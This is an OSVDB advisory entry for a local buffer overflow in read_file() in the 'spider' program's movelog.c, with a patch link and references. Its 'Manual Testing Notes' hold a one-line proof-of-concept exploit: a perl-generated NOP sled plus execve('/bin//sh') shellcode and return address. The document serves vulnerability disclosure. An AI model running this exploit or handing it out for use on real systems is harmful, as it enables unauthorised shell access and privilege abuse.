spider movelog.c read_file() Local Overflow

2004-10-04T08:33:18
ID OSVDB:10472
Type osvdb
Reporter emuadmin Security Team(security@emuadmin.com)
Modified 2004-10-04T08:33:18

Description

Vulnerability Description

A local overflow exists in spider. Spider fails to properly perfom bounds checking on the "read_file()" function in "movelog.c" resulting in a local overflow. With a specially crafted request, an attacker can cause a buffer overflow resulting in a loss of confidentiality and/or integrity.

Technical Description

Reportedly, this application does not install SGID on several Debian distribution versions.

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, the Emuadmin security team has released a patch to address this vulnerability.

Short Description

A local overflow exists in spider. Spider fails to properly perfom bounds checking on the "read_file()" function in "movelog.c" resulting in a local overflow. With a specially crafted request, an attacker can cause a buffer overflow resulting in a loss of confidentiality and/or integrity.

Manual Testing Notes

sh# spider -s perl -e 'print "\x90" x 987 . "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80". "\x0c\xf6\xf\xbf"'

References:

Security Tracker: 1011510 Secunia Advisory ID:12716 Other Solution URL: http://www.emuadmin.com/contrib/software/spider/spider-1.1.patch Other Advisory URL: http://www.emuadmin.com/advisories/spider-1.1-10032004 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-10/0021.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-10/0029.html ISS X-Force ID: 17573